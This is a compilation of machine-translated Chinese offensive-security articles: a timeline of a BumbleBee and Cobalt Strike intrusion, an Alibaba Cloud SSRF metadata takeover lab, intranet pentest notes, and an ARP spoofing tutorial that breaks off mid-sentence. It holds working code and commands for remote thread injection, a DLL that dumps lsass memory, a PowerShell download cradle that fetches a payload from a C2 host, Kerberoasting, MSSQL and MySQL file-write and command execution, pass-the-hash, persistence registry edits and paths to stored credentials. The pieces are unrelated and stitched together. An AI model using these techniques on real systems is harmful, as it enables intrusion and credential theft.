0 Introduction Practical Case Restoration 《BumbleBee Roasts Its Way To Domain Admin》 The article describes a penetration case in detail, but the organizational structure of the article is based on the ATTCK framework, rather than organized according to the timeline logic. Therefore, it is difficult for penetration personnel to understand and learn the previous and subsequent processes. Here we will sort it out and restore the actual combat according to the timeline. 《BumbleBee Roasts Its Way To Domain Admin》 Original link 1 Day 1 (Day1) 1.1 Sample Delivery It appears to be a machine in the target environment delivered via a download link in the mail. This sample is a password-free package. After decompression, release the file BC_invoice_Report_CORP_46.iso. When mounting this ISO file, an LNK file documents.lnk will be released, and a hidden malicious loader will be executed when double-clicking this shortcut. The goals of the shortcut are as follows: C:\Windows\System32\cmd.exe /c start rundll32 namr.dll,ItalJob 1.1.1 rundll32 analysis Using rundll32 to load and execute is a common penetration routine. You can execute programs in the dll, and you can generally also use it to obtain shells: use exploit/windows/smb/smb_delivery set srvhost 10.x.x.x exploit 1.2 Loading the malicious program BumbleBee The loader BumbleBee returns the Cobalt Strike Session. The attacker uses this Cobalt Strike shell to release wab.exe. The executable file will have wmi execution. C:\Windows\System32\webm\wmiprvse.exe -secured -Embedding wab.exe injects malicious code into the other two processes explorer.exe and rundll32.exe. According to the original text, we use remote thread injection and process injection using the classic Windows system call APIs such as OpenProcess, VirtualAlloc, WriteProcessMemory, and CreateRemoteThread. According to these descriptions, the attacker now has at least Administrator permissions. Generally, if he has Administrator permissions, he will have System permissions. Judging from the article description, the attacker uses getsystem to increase the authority. The code for remote thread injection example is as follows: BOOL CreateRemoteThreadInjectDLL(DWORD dwProcessId, char* pszDllFileName){ HANDLE hProcess=NULL; DWORD dwSize=0; LPVOID pDllAddr=NULL; FARPROC pFuncProcAddr=NULL; hProcess=:OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);//Open the process and get the process handle dwSize=1+ :lstrlen(pszDllFileName); //Get dll size pDllAddr=:VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);//In the application :WriteProcessMemory(hProcess, pDllAddr, pszDllFileName, dwSize, NULL);//Write dll to memory pFuncProAddr=:GetProcAddress(:GetModuleHandle('kernel32.dll'), 'LoadLibiaryA');//Get the function address of the function LoadLibraryA HANDLE hRemoteThread=:CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pFuncProcAddr, pDllAddr, 0, Null);//Create remote thread :CloseHandle(hProcess); return TRUE; } 1.3 Collected host information Attackers use a variety of commands to collect information about operating systems, networks, users, software, processes, domains, etc. ipconfig /all #get network information including domain ping -n 1 [domain] #test domain connectivity net group 'domain admins' /domain #Get domain management group members nslookup x.x.x.x #get x.x.x IP address tasklist #get process information systeminfo #get system information wmic product get name,version #get software information wmic /node'redacted process list brief #get process information net view \\redacted\Files$ /all #Column remote server Files shared directory dir \\redacted\c$\ #Column C disk directory tasklist /v /s x.x.x.x #Remotely get x.x.x.x process details net use net group 'Domain computers' /domain net group 'Enterprise admins' /domain net group 'domain computers' /domain net localgroup administrators nltest /dclist nltest /domain_trusts ping -n 1 remote_ip According to the commands executed above, the attacker has obtained the permissions or username and password of the remote server x.x.x.x. 1.4 Move horizontally to the server and continue to collect information The original description uses the local admin account to move horizontally to a server through the RDP protocol, and releases AnyDesk.exe as a backdoor, and then starts to use adfind.exe to continue to collect information (according to the description, it seems that the server is within the domain): cmd.exe /C af.exe -f '(objectcategory=person)' ad_users.txt cmd.exe /C af.exe -f 'objectcategory=computer' ad_computers.txt cmd.exe /C af.exe -sc trustdump trustdump.txt cmd.exe /C af.exe -gcb -sc trustdump trustdump.txt 2 Day 2 (Day2) 2.1 Continue to collect information on the server The attacker continued to log in to the server using RDP and uploaded VulnRecon, a tool designed specifically to identify the path to elevated permissions on Windows machines. 3 Day 4 (Day4) 3.1 Continue to collect information on the charged host The attacker uploaded the VulnRecon tool and the Sysinternals tool tool kit on multiple machines on the charged host and in the environment, and continued to collect information using VulnRecon, adfind, procdump and other tools. Among them, they use remote services to execute procdump to extract the memory of lsass.exe to obtain credentials, and according to the description, they have obtained permissions to at least several hosts and at least one server. As of now, it seems that there is no access to management or higher permissions. The process of using adfind occurs on the original controlled host, and of course it is not ruled out on the new horizontally moved host. cmd.exe /C adfind.exe -f '(objectcategory=person)' ad_users.txt cmd.exe /C adfind.exe -f 'objectcategory=computer' ad_computers.txt cmd.exe /C adfind.exe -f '(objectcategory=organizationalUnit)' ad_ous.txt cmd.exe /C adfind.exe -sc trustdump trustdump.txt 3.1.1 VulnRecon Analysis VulnRecon has an executable file and a dll, namely vulnrecon.exe and vulnrecon.dll, which are used to enumerate the methods of privilege escalation and information collection. It seems to be a custom tool to upload to the original controlled host. Of course, it is not ruled out on the new host that is moved horizontally. # #vulnrecon.dll PDB: D:\a\_work\1\s\artifacts\obj\win-x64.Release\corehost\cli\apphost\standalone\Release\apphost.pdb #vulnrecon.exe PDB: D:\work\rt\VulnRecon\VulnRecon\obj\Release\net5.0\VulnRecon.pdb # command vulnrecon.exe -v vulnrecon.exe -o vulnrecon.exe -FindVulnerability vulnrecon.exe -i vulnrecon.exe -m cmd.exe /c vulnrecon.exe -FindVulnerability c:\programdata\log.txt cmd.exe /c vulnrecon.exe -i c:\programdata\1.txt cmd.exe /c vulnrecon.exe -o c:\programdata\out.txt It seems that the escalation of power is to perform procdump to obtain lsass memory, which occurs on the original charged host. ### 3.2 Get the credentials in lsas. The file dumped according to the description is saved in ProgramData. It can be retrieved using net use and other methods, and uses mimikatz or pypykatz for cracking. These processes occur on those victim hosts and servers that were discovered from the original charged host and moved laterally to. C:\programdata\procdump64.exe -accepteula -ma lsass.exe C:\ProgramData\lsass.dmp 4 Day 7 (Day7) 4.1 Continue to collect information on the charged server The attacker continued to use VulnRecon to collect information on the server, and also used the Seatbelt tool (a commonly used information collection tool). According to the description, the server's local administrator privileges are used. Seatbelt.exe -group=all -outputfile='C:\ProgramData\seatinfo.txt' vulnrecon.exe -o vulnrecon.exe -v vulnrecon.exe -m cmd.exe /c vulnrecon.exe -FindVulnerability c:\programdata\log.txt 5 Day 11 (Day11) 5.1 Bounce shell on the charged host The attacker is constantly accused of executing powershell commands on the host and downloading the contents of executing a file: C:\Windows\system32\cmd.exe /C powershell.exe -nop -w hidden -c 'IEX ((new-object net.webclient).downloadstring('http://a.b.c.d:80/a'))' According to the default configuration character MZRE of cobalt strike found in a, it can be concluded that this is an instruction to connect to the C2 address. The attacker then acquires a charged host to the C2 controlled by the attacker.  Then start injecting into other processes. According to the original description, several processes such as svchost.exe should be injected. The attacker then executed the powershell module Invoke-Kerberoast and started the kerberoasting attack. This place is still initiated from the host being charged. #Parent process svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:36177/'); Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath C:\ProgramData\REDACTED\ps.txt -append -force -Encoding UTF8 # It can be seen that the output is hashcat mode, and the attack should be brute-force cracking using hashcat 5.1.1 kerberosting attack analysis kerberoasting attack analysis is divided into two types: TGS-Kerberoasting and AS-Kerberoasting. It can be performed using rubeus.exe, msf, powershell. The things it obtains Net-NTLMHash can be cracked using hashcat and other tools to obtain ntlmhash or password. 5.2 Use Minidump for credential extraction The attacker began to use minidump, a credential extraction method that can circumvent Kaspersky. This place is still initiated from the host being charged. #Parent process svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc cmd.exe /C rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 968 C:\ProgramData\REDACTED\lsass.dmp full 5.2.1 Minidump analysis The attacker began to use minidump, a credential extraction method that can circumvent Kaspersky. This place is still initiated from the host being charged. #include stdio.h #include Windows.h #include tlhelp32.h typedef HRESULT(WINAPI* _MiniDumpW)(DWORD arg1, DWORD arg2, PWCHAR cmdline); int GetLsassPid() { PROCESSENTRY32 entry; entry.dwSize=sizeof(PROCESSENTRY32); HANDLE hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL); if (Process32First(hSnapshot, entry)) { while (Process32Next(hSnapshot, entry)) { if (wcscmp(entry.szExeFile, L'lsass.exe')==0) { return entry.th32ProcessID; } } } CloseHandle(hSnapshot); return 0; } void GetDebugPrivilege() { BOOL fOk=FALSE; HANDLE hToken; if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, hToken)) { TOKEN_PRIVILEGES tp; tp.PrivilegeCount=1; LookupPrivilegeValue(NULL, SE_DEBUG_NAME, tp.Privileges[0].Luid); tp.Privileges[0].Attributes=true ? SE_PRIVILEGE_ENABLED : 0; AdjustTokenPrivileges(hToken, FALSE, tp, sizeof(tp), NULL, NULL); fOk=(GetLastError()==ERROR_SUCCESS); CloseHandle(hToken); } } void DumpLsass() { wchar_t ws[100]; _MiniDumpW MiniDumpW; MiniDumpW=(_MiniDumpW)GetProcAddress(LoadLibrary(L'comsvcs.dll'), 'MiniDumpW'); swprintf(ws, 100, L'%u %hs', GetLsassPid(), 'c:\\windows\\temp\\temp.bin full'); GetDebugPrivilege(); MiniDumpW(0, 0, ws); } BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: DumpLsass(); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } I have compiled this file myself, and I am here to thank the former A-Team bosses for the penetration technology vision and the spirit of foreign XPN giants who are willing to share. Compilation and usage reference 5.3 Continue information collection on the charged host Continue to use adfind to collect information on the initially charged host. cmd.exe /C adfind.exe -f '(objectcategory=person)' ad_users.txt cmd.exe /C adfind.exe -f 'objectcategory=computer' ad_computers.txt cmd.exe /C adfind.exe -sc trustdump trustdump.txt 5.4 Execute powershell again on the initially charged machine, the same as before The attacker is constantly accused of executing powershell commands on the host and downloading the contents of executing a file: C:\Windows\system32\cmd.exe /C powershell.exe -nop -w hidden -c 'IEX ((new-object net.webclient).downloadstring('http://a.b.c.d:80/a'))' The above process is described in detail in 5.1 and will not be repeated. 5.5 Information collection on more machines Execute the following command on more machines: C:\Windows\system32\cmd.exe /C net accounts /domain C:\Windows\system32\cmd.exe /C net view /all C:\Windows\system32\cmd.exe /C whoami C:\Windows\system32\cmd.exe /C net view \\x.x.x.x\ /all C:\Windows\system32\cmd.exe /C wmic /node:x.x.x.x process list brief C:\Windows\system32\cmd.exe /C net ''domain controllers' /domain C:\Windows\system32\cmd.exe /C net nltest /dclist:[domain] 5.6 Two batch scripts The attacker uploads and executes two scripts s.bat and w.bat, which can analyze and discover other targets within the environment. # s.bat echo off for /f %%i in (servers.txt) do for /f 'tokens=2 delims=[]' %%j in ('ping -n 1 -4 '%%i'') do @echo %%j serv.log # w.bat @echo off for /f %%i in (workers.txt) do for /f 'tokens=2 delims=[]' %%j in ('ping -n 1 -4 '%%i'') do @echo %%j work.log 5.7 Last After the two scripts are run, a new cobalt strike session is run again on the initially charged machine. Then the attacker uses a service account to move horizontally and executes a cobalt strike session on the domain control. According to the original description, this is a weak password, which is blasted by the operation of cracking the net-ntlm hash value obtained by hashcat to crack tgs-kerberoasting. The attacker dumps lsass on the domain control. Exe's process memory can obtain domain admin permissions and break through domain control Original source: https://www.cnblogs.com/KevinGeorge/p/16595912.html

0x00 Introduction This article will use Alibaba Cloud as an example to demonstrate some offensive and defensive methods in cloud services. First, use Terraform to build an ECS SSRF vulnerability environment, and then step by step to obtain all Alibaba Cloud service permissions of the cloud service account through the SSRF vulnerability existing in the instance. 0x01 Environment construction This article uses TerraformGoat to build the shooting range. TerraformGoat range address: https://github.com/HuoCorp/TerraformGoat(opens new window) When deploying a shooting range, you need to use your Alibaba Cloud AccessKey. In order to avoid affecting your cloud production environment, it is highly recommended to use AccessKey in non-production environments here and do not use the same account as the production environment. Due to the iterative update of the TerraformGoat tool, the following environment construction method has failed, and the deployment method is now more convenient and friendly. For specific deployment methods, please refer to the TerraformGoat shooting range address above. Next, we start to build a shooting range, first clone the shooting range project to the local area, and build the dependencies needed to download the shooting range. git clone https://github.com/HuoCorp/TerraformGoat.git --depth 1 cd TerraformGoat docker build . -t terraformgoat:v0.0.3 docker run -itd --name terraformgoat terraformgoat:v0.0.3 docker exec -it terraformgoat /bin/bash If github access is slow, you can hang a proxy to the terminal proxy_url='127.0.0.1:1080' export https_proxy=http://$proxy_url http_proxy=http://$proxy_url all_proxy=socks5://$proxy_url After entering the container, the container will prompt you to select the cloud service provider you want to use next. Here, take Alibaba Cloud service as an example, enter 2 and select Alibaba Cloud and press Enter. Enter the Alibaba Cloud ECS SSRF shooting range path and configure your AccessKey cd /TerraformGoat/aliyun/ecs/ecs_ssrf/ aliyun configuration Deploy SSRF Range terraform init terraform apply If init initialization is slow, just hang up the proxy. During the apply period, Enter a value will be prompted, and then enter yes to enter. At Outputs, you can see the returned range address. When you visit this address, you can see the SSRF test range page. This means that the environment has been built. 0x02 Environmental Utilization There is an SSRF vulnerability in the current environment, but unlike the environment in which regular SSRF is located, the SSRF vulnerability here appears on the cloud server, which means that we can obtain the metadata information of the server through this SSRF vulnerability. Access metadata http://100.100.100.200/latest/meta-data In the returned result, you can see that the current environment has a ram/directory, which means that the current cloud server has configured a RAM role, so that we can obtain temporary credentials. Get temporary credentials through metadata The huocorp-terraform-goat-role in the URL here is the RAM role name, which can be obtained by visiting http://100.100.100.200/latest/meta-data/ram/security-credentials/. http://100.100.100.200/latest/meta-data/ram/security-credentials/huocorp-terraform-goat-role Configure temporary credentials into the aliyun command line tool. aliyun configure --mode StsToken Create sub-users and grant administrator permissions aliyun ram CreateUser --UserName teamssix aliyun ram CreateLoginProfile --UserName teamssix --Password TeamsSix@666 aliyun ram AttachPolicyToUser --PolicyType System --PolicyName AdministratorAccess --UserName teamssix Visit the https://signin.aliyun.com(opens new window) page and log in through a RAM user. The user format here is username@company-alias, where username is the username you just created. company-alias can be obtained through the following command. aliyun ram GetAccountAlias The AccountAlias here is the company-alias we need, and you can log in to the console next. Enter the password when the user was created just now After logging in, you can see the target console. Since AdministratorAccess permission was granted when creating a user just now, you can see from the RAM access control office that the current account has permission to manage all Alibaba Cloud resources. In the cloud service ECS instance, you can also see the SSRF shooting range server we just built. At this point, it has been implemented to take over the Alibaba Cloud console by taking advantage of the SSRF vulnerability on the cloud server. In addition, a flag file is also placed in this environment. If you are interested, you can try to find this flag. Writeup address: https://github.com/HuoCorp/TerraformGoat/tree/main/aliyun/ecs/ecs_ssrf(opens new window) 0x03 Defense Measures In addition to SSRF, there are two other major problems in this environment: The RAM role has too large permissions, which leads to the operation metadata such as creating sub-users through the permissions of the role and granting high permissions to the sub-users without any reinforcement. As a result, once the target has SSRF or the target permissions are taken down, the metadata is at risk of being acquired. For the problem of excessive permissions of the first RAM role, the main thing is that the user strictly abides by the principle of minimizing permissions. When granting permissions to the RAM role, avoid giving too high permissions and only granting the permissions they need, which can minimize the impact, but this cannot cure the root cause. In response to the problem that the second metadata is not hardened to access, the metadata access mode on the instance can be set to hardened mode. This is a fundamental solution. There are two ways to set the metadata access mode to hardened mode: When creating an instance, you can set "Instance Metadata Access Mode" to "Righten Only Mode" in the Advanced Options of System Configuration In the already created instance, you can enable metadata forced access using Token in Alibaba Cloud OpenAPI. OpenAPI address: https://next.api.aliyun.com/api/Ecs/2014-05-26/ModifyInstanceMetadataOptions(opens new window) Setting HttpTokens to required means that the hardening mode is used forcefully. At this time, accessing the metadata will prompt 403. It is worth mentioning that setting metadata to harden mode can prevent metadata from being obtained through SSRF, but if the instance permission is taken down, the red team can still execute the command to get the token on the instance and then use the token to get the metadata. The command to get token in a Linux instance is as follows: TOKEN=`curl -X PUT 'http://100.100.100.200/latest/api/token' -H 'X-aliyun-ecs-metadata-token-ttl-seconds: 21600'`Get metadata through token curl -H 'X-aliyun-ecs-metadata-token: $TOKEN' http://100.100.100.200/latest/meta-data/ For the method to obtain under Windows instances, please refer to Alibaba Cloud's official document: https://help.aliyun.com/document_detail/108460.htm(opens new window) This method to set the metadata access mode to reinforcement mode to defend against SSRF vulnerabilities is provided by Master 2h0ng 0x04 Environment Delete Delete the created sub-account aliyun ram DetachPolicyFromUser --PolicyType System --PolicyName AdministratorAccess --UserName teamssix aliyun ram DeleteUser --UserName teamssix deletes the SSRF shooting range environment. After using the shooting range, remember to delete it in time, because the cloud service created here is billed by time, and the price of this shooting range instance is RMB 0.17 per hour. Before destroying the shooting range, remember to configure AccessKey as the initial AccessKey, and configure the command: aliyun configure --mode AK terraform destroy If you want to clear TerraformGoat, you can use the following command. If you want to learn cloud attack and defense in the future, you can keep the TerraformGoat environment. docker stop terraformgoat docker rm terraformgoat docker rmi terraformgoat:v0.0.3 0x05 Summary Here, a temporary key was obtained through the SSRF vulnerability on the cloud. A subscriber with administrator access was created through the temporary key, and finally the target console was taken over through this subscriber. However, there are some prerequisites for using this method in actual combat, and the main prerequisites are the following two: The ECS instance needs to be granted a RAM role, otherwise the metadata of accessing temporary credentials will return 404RAM. The role needs to have relevant operational permissions for ram access control, such as creating users, granting permissions, etc. otherwise the temporary key will not have the permission to create sub-users. In actual combat, if an ECS instance is granted a RAM role, most of the time the role does not have the user creation permission. At this time, it is impossible to log in to the console by creating a sub-account. You can only operate the target cloud service through the Alibaba Cloud command line tool. In general, cloud attack and defense are still very different from conventional intranet attack and defense. A common problem with cloud attack and defense is configuration errors. For example, the problem here is that the RAM role configuration permissions are too high. The main method of maintaining permissions on cloud attack and defense is to create high-privileged RAM users, rather than having a variety of permissions on traditional attack and defense. The intranet horizontal direction of cloud attack and defense is mainly horizontally in the cloud service manufacturer's command line or console, from this cloud service to another cloud service, rather than having various intranet horizontal methods like traditional attack and defense.Finally, many of the commands mentioned in this article refer to the content in the Fireline Cloud Security Knowledge Base. The knowledge base address is: https://cloudsec.huoxian.cn(opens new window). You can see the Fireline Cloud Service Attack and Defense Matrix on the homepage of the knowledge base. This article is the cloud attack and defense based on this attack and defense matrix. If you want to find more cloud security resources to learn, you can visit the Awesome Cloud Security project, which currently contains more than a hundred domestic and foreign cloud security blogs, tools, official accounts and other resources. The project address is: https://github.com/teamssix/awesome-cloud-security(opens new window) Reference article: https://cloudsec.huoxian.cn/docs/articles/aliyun/aliyun_ecs Original connection: https://wiki.teamssix.com/CloudService/EC2/aliyun-console-takeover.html

0x00 Environment Linux host www permission host cannot go out of the external network forward proxy cannot use segment B intranet 0x01 Collect information F-Scrack.py to obtain Redis, ES, etc. The PS: Scrack.py's mssql module blasting is inaccurate, you can write a simple one by yourself python Scrack.py -h 10.111.1.1-10.111.2.254 -p 3306,5432 -m 200 -t 6 1.Redis Do not use keys when there are many keys * View basic information : master, quantity, version number Use scan to view keys: scan 0 match * count 100 View type : type key Hash type : hgetall key 2.MySQL In Windows, you can first test whether you can write to the plug-in directory : select @@plugin_dir; select hello into outfile plugin_dir; then use the udf that comes with msf, first convert it to hexadecimal, and then export it to plugin directory : use test; set @a=concat('',0xhex_of_exe); create table Ghost(data LONGBLOB); insert into Ghost values(''); update Ghost set data=@a; select data from Ghost into DUMPFILE dir; create function sys_eval returns string soname 'sys_eval.dll'; drop function sys_eval; //Delete after use, and develop good habits, first choose SYS_EVAL. Try not to use SYS_EXEC (it will crash) 3.mssql mssql blasting should be placed in the back as much as possible, as the movement will be relatively large. After the mssql blasting is successful, it is best to use CLR to obtain permissions. Using `xp_cmdshell` directly will die, and 360 will intercept it. It is known that the user password, certutil and other tools of mssql will be intercepted or alarmed. You can use the tools provided by mssql to write to the hard disk: Now open stored procedure : sp_configure 'show advanced options', 1; GO RECONFIGURE; GO sp_configure 'Ole Automation Procedures', 1; GO RECONFIGURE; mssql writes large files For example, exe and other things are converted to hex first, and then written to file : xxd -plain /tmp/test.exe | tr -d '\n' /tmp/dll.hex declare @hexstring varchar(max); set @hexstring='hex after conversion'; declare @file varbinary(max); set @file=(select cast('' as xml).value('xs:hexBinary( substring(sql:variable('@hexstring'), sql:column('t.pos')) )', 'varbinary(max)') from (select case substring(@hexstring, 1, 2) when '0x' then 3 else 0 end) as t(pos)); select @file; declare @init int; declare @filepath nvarchar(4000)=N'c:\22.exe'; EXEC sp_OACreate 'ADODB.Stream', @init OUTPUT; -- An instance created EXEC sp_OASetProperty @init, 'Type', 1; EXEC sp_OAMethod @init, 'Open'; -- Calling a method EXEC sp_OAMethod @init, 'Write', NULL, @file; -- Calling a method EXEC sp_OAMethod @init, 'SaveToFile', NULL, @filepath, 2; -- Calling a method EXEC sp_OAMethod @init, 'Close'; -- Calling a method EXEC sp_OADestroy @init; -- Closed the resources 4.mssql backup BACKUP DATABASE db TO DISK='C:\Windows\temp\db.bak' WITH COMPRESSION, INIT, STATS=5; Volume compression rar.exe a -m0 -v100m C:\windows\temp\db.split C:\windows\tasks\db.bak download C:\\windows\temp\\db.split.rar /var/tmp/ 6.pth wmiwmic /node:192.168.1.158 /user:pt007 /password:admin123 process call create 'cmd.exe /c ipconfigd:\result.txt' Recommended to use wmiexec.vbs: https://github.com/l3m0n/pentest_study/blob/master/tools/wmiexec.vbs cscript C:\Windows\Tasks\aliwmi.vbs /cmd ip 'C:\Windows\system32\calc.exe'msfuse exploit/windows/smb/psexec show options set RHOST 192.168.81.129 set SMBPass 598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF set SMBUser Administrator show options runmimikatz || Cobalt Strikemimikatz.exe privilege:debug 'sekurlsa:pth /domain: /user:administrator /ntlm:2D20D252A479F485CDF5E171D93985BF /run:cmd.exe' //pass hashpsexecpsexec /accepteula //accept the license agreement sc delete psexesvc psexec \\192.168.1.185 -u pt007 -p admin123 cmd.exe psexec.vbscscript psexec.vbs 192.168.1.158 pt007 admin123 'ipconfig' remote command execution scnet use \\192.168.17.138\c$ 'admin123' /user:pt007 net use dir \\192.168.17.138\c$ copy test.exe \\192.168.17.138\c$ sc \\192.168.17.138 create test binpath='c:\test.exe' sc \\192.168.17.138 start test sc \\192.168.17.138 del test 9 ways to remotely execute cmd in windows :https://xz.aliyun.com/t/5957 0x03 access is denied For any computer that is not a RID 500, the token used is medium token, whether using wmi, psexec or other methods. When using wmiexec, it will be corrected that Access is Denied When crawling a hash, the registry can be modified so that all local administrator group members can connect remotely as a means of persistence. reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f ###RDP's PTH When the crawling hash cannot be cracked, if you use hash to log in to RDP remotely, the system you are logged in needs to enable "Restricted Admin Mode", which is enabled by default on Windows 8.1 and Windows Server 2012R2. Windows 7 and WinServer 2008 require installation of 2871997 and 2973351 pudding. 1. Start RDP REG ADD 'HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server' /v fDenyTSConnections /t REG_DWORD /d 00000000 /f REG ADD 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' /v PortNumber /t REG_DWORD /d0x00000d3d /f # Listen to port 3389 Turn on 3389 wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !='') call setallowtsconnections 1 2. Turn on Restricted Admin mode REG ADD 'HKLM\System\CurrentControlSet\Control\Lsa' /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f 3. Add firewall rules netsh advfirewall firewall add rule name='Remote Desktop' dir=in protocol=TCP localport=3389 action=allow 0x04 dump password ####dbeaver dbeaver6 configuration file (the storage location and decryption method are different in different versions) : #Password encrypted storage location : C:\Users\user\AppData\Roaming\DBeaverData\workspace6\General\.dbeaver\credentials-config.json #url and username : C:\Users\user\AppData\Roaming\DBeaverData\workspace6\General\.dbeaver\data-sources.json decryption script:https://gist.github.com/felipou/50b60309f99b70b1e28f6d22da5d8e61 After downloading the credentials-config.json script, use python to decrypt :python decrypt.py credentials-config.json, and then search the corresponding IP and username in data-sources.json based on the decrypted id. The old version of the password is stored in :C:\Users\users\.dbeaver4\General\.dbeaver-data-source.xml. You can use the online decryption directly using :http://dbeaver-password-decrypter.s3-website-us-west-2.amazonaws.com/ 0x05 MobaXterm There is a .ini file with corresponding IP information and private key address Old version of storage : C:\Users%USERNAME%\AppData\Roaming\MobaXterm 2020 version : C:\Users%USERNAME%\Documents\MobaXterm 0x05 VSCODE The configuration file under Windows is in this place : %APPDATA%\Code\User\settings.json can find storage locations such as notes and ssh based on configuration files 0x06 Firefox Master Sanhao said it very much, I chose to use firepwd.py: Firefox configuration file directory : %APPDATA%\Mozilla\Firefox\Profiles\

ARP Attack Introduction to the Agreement The full name of ARP is Address Resolution Protocol, which is an address resolution protocol. It is a TCP/IP protocol that obtains physical addresses based on IP addresses. When the host sends information, it broadcasts the ARP request containing the target IP address to all hosts on the network and receives a return message to determine the target's physical address. After receiving the return message, the IP address and physical address are stored in the native ARP cache and reserved for a certain period of time. The ARP cache is directly queried the next time you request it to save resources. The ARP address resolution protocol is based on the mutual trust between various hosts in the network. The host on the network can send ARP reply messages independently. When other hosts receive the reply message, they will not detect the authenticity of the message and will record it into the native ARP cache. Therefore, the attacker can send a pseudo ARP reply message to a certain host, so that the information it sends cannot reach the expected host or the wrong host, which constitutes an ARP spoof. Working Principle Environmental Assumption Host A: IP address: 192.168.1.1MAC address: 0A-11-22-33-44-01Host B: IP address: 192.168.1.2MAC address: 0A-11-22-33-44-02 Workflow Step 1: According to the routing table content on Host A, determine that the forwarding IP address used to access Host B is 192.168.1.2, and then host A checks the matching MAC address of Host B in its local ARP cache. Step 2: If Host A does not find the mapping in the ARP cache, it will ask the hardware address of 192.168.1.2, thereby widening the ARP request frames. Play to all hosts on the local network, and the IP address and MAC address of the source host A are included in the ARP request. Each host on the local network receives the ARP request and checks whether it matches its own IP address. If the host finds that the requested IP address does not match its own IP address, it will discard the ARP request. Step 3: Host B determines that the IP address in the ARP request matches its own IP address, then the IP address and MAC location of the host A are Address mapping is added to the local ARP cache. Step 4: Host B sends the ARP reply message containing its MAC address directly back to Host A. Step 5: When Host A receives the ARP reply message sent from Host B, it will update the ARP cache with the IP and MAC address mapping of Host B. The local cache has a lifetime. After the lifetime ends, the above process will be repeated again. Once the MAC address of Host B is determined, Host A can send IP communication to Host B. Cache Mechanism ARP cache is a buffer used to store IP addresses and MAC addresses. Its essence is a corresponding table of IP addresses-MAC addresses. Each entry in the table records the IP addresses and corresponding MAC addresses of other hosts on the network. Each Ethernet or token ring network adapter has its own separate table. When the address resolution protocol is asked about the MAC address of a known IP address node, it is first viewed in the ARP cache. If it exists, it will directly return the corresponding MAC address. If it does not exist, it will send an ARP request to query the LAN. In order to minimize the broadcast volume, ARP maintains the cache of IP addresses to MAC address mapping for future use. ARP cache can contain dynamic and static projects. Dynamic projects are automatically added and deleted over time. The potential life cycle of each dynamic ARP cache item is 10 minutes. The newly added items are timestamped. If a project is not used within 2 minutes after it is added, the project expires and is deleted from the ARP cache. If a project is already in use, another 2 minutes of life cycle will be received. If a project is always in use, another 2 minutes of life cycle will be received until the longest life cycle of 10 minutes. The static project remains in the cache until the computer is restarted. ARP spoofing The ARP address resolution protocol is based on the mutual trust between various hosts in the network. Its birth makes the network run more efficiently, but it also has flaws. The ARP address translation table depends on the dynamic update of cache memory in the computer, and the update of cache memory is limited by the update cycle, and only the mapping relationship table entry of the recently used address is saved. This gives an opportunity for attackers to modify the address translation table before the cache memory updates the table entry to achieve an attack. ARP request is sent in a broadcast form. The host on the network can send ARP reply messages independently. When other hosts receive the reply message, they will not detect the authenticity of the message and record it in the local MAC address translation table. In this way, the attacker can send a pseudo ARP reply message to the target host, thereby tampering with the local MAC address table. ARP spoofing can cause the target computer to fail to communicate with the gateway, and will also lead to communication redirection. All data will be passed through the attacker's machine. The attacker forwards the data between the target and the gateway. This can be used as an 'intermediary' to achieve the purpose of listening to the target without affecting the target's normal Internet access. Deception Practice Basic Environment Attack host: 192.168.174.129 00:0c:29:39:be:eb Normal host: 192.168.174.170 00:0c:29:08:ad:eb Gateway address: 192.168.174.2 Disconnection attack Step 1: Close port forwarding on attack host #termination echo 0 /proc/sys/net/ipv4/ip_forward #allow echo 1 /proc/sys/net/ipv4/ip_forward Step 2: View the current ARP resolution list on a normal host Step 3: Pin to Baidu on a normal host ping www.baidu.com -t You can access Baidu normally: Step 4: Then, the network is cut off by aprspoof on the attack host Usage: arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host # Parameter explanation: -i Specify the interface to use -c Specifies the MAC address used when restoring the arp configuration. The default is to use the original MAC (that is, after stopping the arpspoof command, it will be desalted by default) -t Specify the host to be poisoned. If not specified, it defaults to all hosts under the LAN -r Two-way poisoning (host and target), thus bidirectional capture of data (only valid if -t is specified at the same time) #Execution Example: arpspoof -i eth0 -t 192.168.174.170 192.168.174.2 Step 5: You can see that the ping request timed out, and the browser cannot open www.baidu.com. At the same time, checking the ARP resolution table, you will find that the gateway's MAC address was successfully spoofed and set to the attacker's MAC address. Step 6: Afterwards the attack was interrupted (because we did not specify the -c parameter before, the original MAC address will be restored) You can see that the ping returns to normal, and the page and ARP table also return to normal Image Data Step 1: Turn on port forwarding, allowing the machine to forward data information like a router echo 1 /proc/sys/net/ipv4/ip_forward Step 2: View the current ARP resolution list on a normal host Step 3: Access the web page on a normal host Usage: arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host # Parameter explanation: -i Specify the interface to use -c Specifies the MAC address used when restoring the arp configuration. The default is to use the original MAC (that is, after stopping the arpspoof command, it will be desalted by default) -t Specify the host to be poisoned. If not specified, it defaults to all hosts under the LAN -r Two-way poisoning (host and target), thus bidirectional capture of data (only valid if -t is specified at the same time) #Execution Example: arpspoof -i eth0 -t 192.168.174.170 192.168.174.2 Step 5: Afterwards, driftnet obtains the residual image data information of the victim user when visiting the website Login credentials Step 1: Here we continue to expand the above image data part, we 